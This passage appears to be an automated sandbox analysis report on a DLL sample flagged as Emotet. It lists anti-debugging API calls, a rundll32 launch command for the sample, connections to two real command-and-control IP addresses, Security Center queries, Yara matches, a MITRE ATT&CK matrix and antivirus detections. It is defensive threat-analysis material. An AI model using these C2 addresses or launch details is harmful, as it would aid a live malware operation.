Code function: 3_2_100178B6 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,

3_2_100178B6

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_040DF7F7 mov eax, dword ptr fs:[00000030h]	3_2_040DF7F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0500F7F7 mov eax, dword ptr fs:[00000030h]	4_2_0500F7F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0485F7F7 mov eax, dword ptr fs:[00000030h]	5_2_0485F7F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04DFF7F7 mov eax, dword ptr fs:[00000030h]	8_2_04DFF7F7

Source: C:\Windows\System32\loaddll32.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001C49A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_1001C49A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10021743 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_10021743
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100167D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_100167D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001FC21 SetUnhandledExceptionFilter,__encode_pointer,	3_2_1001FC21
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001FC43 __decode_pointer,SetUnhandledExceptionFilter,	3_2_1001FC43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001C49A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_1001C49A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10021743 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_10021743
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100167D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_100167D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001FC21 SetUnhandledExceptionFilter,__encode_pointer,	4_2_1001FC21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001FC43 __decode_pointer,SetUnhandledExceptionFilter,	4_2_1001FC43

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 69.16.218.101 144			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.138.98.34 80			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",#1

Jump to behavior

Source: rundll32.exe, 0000000A.00000002.762963759.0000000003AC0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 0000000A.00000002.762963759.0000000003AC0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 0000000A.00000002.762963759.0000000003AC0000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: rundll32.exe, 0000000A.00000002.762963759.0000000003AC0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: rundll32.exe, 0000000A.00000002.762963759.0000000003AC0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	3_2_10027704
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	3_2_1000A803
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,	3_2_10023880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	4_2_10027704
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	4_2_1000A803
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	4_2_10023880

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_10022853 cpuid

3_2_10022853

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_1001F914 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_1001F914

Source: C:\Windows\SysWOW64\regsvr32.exe

3_2_100178B6

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: svchost.exe, 00000012.00000002.760931158.0000017D1C83D000.00000004.00000001.sdmp	Binary or memory string: &@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000012.00000002.760788276.0000017D1C813000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.761024824.0000017D1C902000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 10.2.rundll32.exe.5d70000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.23d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5790000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ed0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5480000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4e90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5fd0000.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.53f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.51a0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3360000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.40d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5aa0000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.51d0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.54f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.36e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5020000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5340000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4ff0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4850000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5600000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.54f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5050000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.55d0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5730000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.2790000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4db0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5310000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5450000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4df0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.57c0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5c70000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4d60000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4cc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5870000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4fc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5a70000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3070000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5520000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.59c0000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5730000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.6000000.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3330000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5da0000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5d70000.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.26d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5990000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5870000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.53f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3330000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5790000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4e60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.58a0000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5a70000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5990000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5450000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5020000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.51a0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.23d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4d60000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.26d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5760000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5c70000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5ca0000.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5420000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3070000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ed0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.5fd0000.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.55d0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4e60000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4fc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.247708165.0000000004ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.764384798.0000000005D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251269260.0000000004DB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.764593172.0000000005FD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.250801502.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251317536.0000000004E60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763160491.00000000054F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.251543763.0000000005450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251018853.0000000004851000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.254580749.0000000002791000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763467558.0000000005790000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.764153228.0000000005C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763888533.0000000005AA1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763578627.0000000005870000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763623141.00000000058A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.761812038.0000000003361000.00000020.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251440561.0000000004FC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.250842742.0000000003070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763204211.0000000005521000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.247153008.00000000026D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.251348106.0000000005341000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763293110.0000000005601000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.762842466.00000000036E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.251435374.00000000053F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251474105.0000000004FF1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.254179155.00000000023D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.764675936.0000000006001000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251540171.0000000005051000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.251287174.0000000005310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251612529.00000000051D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.764435934.0000000005DA1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763511347.00000000057C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.251607526.0000000005481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763831341.0000000005A70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.764277951.0000000005CA1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.761623893.0000000003330000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251214045.0000000004D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763416711.0000000005761000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251508844.0000000005020000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.762037427.0000000003480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.250952211.0000000004DF1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763764045.00000000059C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251355041.0000000004E91000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.251487303.0000000005421000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763708229.0000000005990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.251578591.00000000051A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763252082.00000000055D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.247759843.0000000005001000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.763375282.0000000005730000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100011C0 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,		3_2_100011C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100011C0 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,		4_2_100011C0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	Input Capture1	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection112	Deobfuscate/Decode Files or Information1	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	System Information Discovery45	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	DLL Side-Loading1	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	Security Software Discovery61	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading2	Cached Domain Credentials	Virtualization/Sandbox Evasion3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion3	DCSync	Process Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection112	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories1	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Regsvr321	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Rundll321	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
M2hsMd9hTq.dll	25%	Virustotal		Browse
M2hsMd9hTq.dll	35%	ReversingLabs	Win32.Trojan.Emotet
M2hsMd9hTq.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
9.2.rundll32.exe.23d0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
4.2.rundll32.exe.4ed0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.3360000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.53f0000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.rundll32.exe.4e90000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.36e0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.51d0000.11.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.51a0000.10.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.5fd0000.22.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
8.2.rundll32.exe.5480000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.5aa0000.17.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.5340000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.regsvr32.exe.40d0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.54f0000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.rundll32.exe.4ff0000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.5600000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.4850000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.5050000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.rundll32.exe.2790000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.5450000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.rundll32.exe.4db0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.4d60000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
8.2.rundll32.exe.5310000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.57c0000.11.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.4df0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.5c70000.18.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.rundll32.exe.4fc0000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.5a70000.16.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.5520000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.5730000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.59c0000.15.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.5000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.6000000.23.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.regsvr32.exe.26d0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.5da0000.21.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.5990000.14.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.5d70000.20.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.5870000.12.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.5790000.10.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.3330000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.58a0000.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.5020000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
